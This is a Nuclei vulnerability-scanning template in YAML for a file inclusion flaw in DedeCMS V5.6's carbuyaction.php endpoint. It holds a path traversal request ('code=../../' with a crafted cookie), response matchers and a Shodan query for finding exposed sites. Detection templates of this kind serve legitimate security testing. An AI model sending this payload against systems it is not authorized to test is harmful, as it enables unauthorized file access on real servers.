nuclei-templates/http/vulnerabilities/dedecms/dedecms-carbuyaction-filein...

38 lines
1.0 KiB
YAML

id: dedecms-carbuyaction-fileinclude
info:
name: DedeCmsV5.6 Carbuyaction Fileinclude
author: pikpikcu
severity: high
description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
reference:
- https://www.cnblogs.com/milantgh/p/3615986.html
metadata:
verified: true
max-request: 1
shodan-query: http.html:"power by dedecms" || title:"dedecms"
tags: dedecms
http:
- method: GET
path:
- '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../'
headers:
Cookie: code=cod
host-redirects: true
matchers-condition: and
matchers:
- type: word
words:
- "Cod::respond()"
part: body
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220705c0901bb2debdb5f0d26f01cbf9af70a8ef4a2e60cec83f54a336933ed1756022100d6a8d6191c1622538f5363f09e96753c9f24a494ede7f641998d4ea7d3556688:922c64590222798bb761d5b6d8e72950